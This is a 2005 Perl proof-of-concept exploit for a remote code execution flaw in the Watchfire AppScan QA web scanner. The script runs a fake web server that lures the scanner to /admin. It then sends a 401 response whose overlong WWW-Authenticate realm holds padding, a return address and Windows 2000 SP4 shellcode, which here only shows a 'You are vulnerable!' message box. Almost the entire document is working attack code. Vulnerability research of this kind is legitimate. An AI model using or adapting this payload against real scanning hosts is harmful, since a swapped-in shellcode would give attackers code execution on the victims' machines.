# Title : Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
# Published : 2005-12-15
# Author : Mariano Nuñez
# Watchfire AppScan QA PoC - Coded by Mariano Nuñez Di Croce @ CYBSEC
#
# How to use:
# 1. Run this script on an isolated lab host to set up the fake web server. It needs root (it listens on TCP port 80) and binds every interface, so anything that requests /admin from it is sent the crash payload, not just the scanner.
# 2. Scan the server with AppScan QA, either in Interactive or Manual mode.
# 3. If you get a "You are vulnerable!" popup, you should upgrade immediately.
#
# PoC developed for Windows 2000 Server SP4. The return address and the absolute API addresses embedded in the shellcode are specific to that build; on any other Windows version expect at most a crash of the scanner rather than the popup.
#
#!/usr/bin/perl -w
use strict;
use warnings;
use IO::Socket::INET;
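# Flush STDOUT as we go so progress messages are not held in the buffer.
$| = 1;

# Writing to a socket the scanner has already closed raises SIGPIPE, which
# would kill the whole server; ignore it and let print() report the error.
$SIG{PIPE} = 'IGNORE';

# Canned 200 OK response. Its only content is a link to /admin, which is what
# lures the scanner into requesting the "protected" resource. Header values
# (Date, Content-Length) are kept as captured and are not recomputed.
my $res200 = join '',
    "HTTP/1.1 200 OK\r\n",
    "Host: www.test.com\r\n",
    "Date: Thu, 01 Nov 2005 14:38:20 GMT\r\n",
    "Server: Apache\r\n",
    "Content-Length: 26\r\n",
    "Keep-Alive: timeout=15, max=100\r\n",
    "Connection: Close\r\n",
    "Content-Type: text/html; charset=ISO-8859-1\r\n",
    "\r\n",
    "<a href='/admin'>admin</a>";

# 401 response, split around the WWW-Authenticate realm: the opening quote of
# the realm value is the last byte of $res401Head, and the closing quote is
# appended after the payload (below) so the line still looks like a Basic
# challenge to the scanner. The overlong realm is the trigger.
my $res401Head = join '',
    "HTTP/1.1 401 Authorization Required\r\n",
    "Host: www.test.com\r\n",
    "Date: Thu, 01 Nov 2005 14:43:53 GMT\r\n",
    "Server: Apache\r\n",
    "WWW-Authenticate: Basic realm=\"";

my $res401Tail = join '',
    "Content-Length: 401\r\n",
    "Keep-Alive: timeout=15, max=100\r\n",
    "Connection: Close\r\n",
    "Content-Type: text/html; charset=iso-8859-1\r\n",
    "\r\n",
    "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML2.0//EN\">\r\n",
    "<html><head>\r\n",
    "<title>401 Authorization Required</title>\r\n",
    "</head><body>\r\n",
    "<h1>Authorization Required</h1>\r\n",
    "<p>This server could not verify that you\r\n",
    "are authorized to access the document\r\n",
    "requested. Either you supplied the wrong\r\n",
    "credentials (e.g., bad password), or your\r\n",
    "browser doesn't understand how to supply\r\n",
    "the credentials required.</p>\r\n",
    "</body></html>";

# Address of a "call ebx" in user32.dll on Windows 2000 Server SP4 (original
# author's note). Packed explicitly little-endian ("V") rather than with the
# host-native "l" so the bytes are the same on any host. The layout below
# (short jump, pointer, shellcode) looks like an SEH-handler overwrite, but
# the original does not say so -- treat that as unconfirmed.
my $ret = pack('V', 0x77e11627);

# Windows x86 shellcode that pops a MessageBoxA("You are vulnerable!") and
# exits. Each embedded string ends in a placeholder 'N' that the code
# overwrites with a NUL byte before use (mov [ecx+off], dl with edx = 0).
# The three absolute addresses it calls (0x7c590221, 0x7c590cab, 0x7c5969be)
# are hard-coded for Windows 2000 SP4 -- presumably LoadLibraryA,
# GetProcAddress and ExitProcess, inferred from the call pattern only.
my $scode =
    "\x31\xd2\xeb\x35\x59\x88\x51\x06\xbb\x21\x02\x59\x7c\x51\xff\xd3"           # load user32
  . "\xeb\x33\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\xab\x0c\x59\x7c\xff\xd3"       # resolve MessageBoxA
  . "\xeb\x33\x59\x31\xd2\x88\x51\x13\x52\x51\x51\x52\xff\xd0"                   # MessageBoxA(0, s, s, 0)
  . "\x31\xd2\x52\xb8\xbe\x69\x59\x7c\xff\xd0"                                   # exit(0)
  . "\xe8\xc6\xff\xff\xff" . "user32N"
  . "\xe8\xc8\xff\xff\xff" . "MessageBoxAN"
  . "\xe8\xc8\xff\xff\xff" . "You are vulnerable!N";

# The malicious 401: padding up to the overwritten pointer, a short jump over
# the pointer itself, the pointer, the shellcode, then the closing realm quote
# and the rest of the captured response.
my $resExploit = $res401Head
    . ("\x41" x 347)
    . "\xeb\x06AA"
    . $ret
    . $scode
    . "\"\r\n"
    . $res401Tail;

# Fake web server. No LocalAddr is given, so it binds every interface; port 80
# needs root on most systems.
my $srv = IO::Socket::INET->new(
    LocalPort => 80,
    Proto     => 'tcp',
    Reuse     => 1,
    Listen    => 1,
) or die "Could not create socket: $!\n";
print "Waiting for connections...\n";

while (my $cli = $srv->accept()) {
    printf "Request from %s\n", $cli->peerhost;

    # Read the request line, then consume the headers up to the blank line
    # that terminates them. The original answered every header line with a
    # full response; this sends exactly one response per request.
    my $request_line = <$cli>;
    if (!defined $request_line) {
        close $cli;
        next;
    }
    while (defined(my $hdr = <$cli>)) {
        last if $hdr =~ /\A\r?\n\z/;
    }

    # Only the request line decides: a request whose target mentions "admin"
    # gets the overlong-realm 401, everything else gets the lure page.
    if ($request_line =~ /admin/) {
        print "Request for protected resource detected...launching exploit\n";
        print {$cli} $resExploit;
    }
    else {
        print {$cli} $res200;
    }
    close $cli;
}
close $srv;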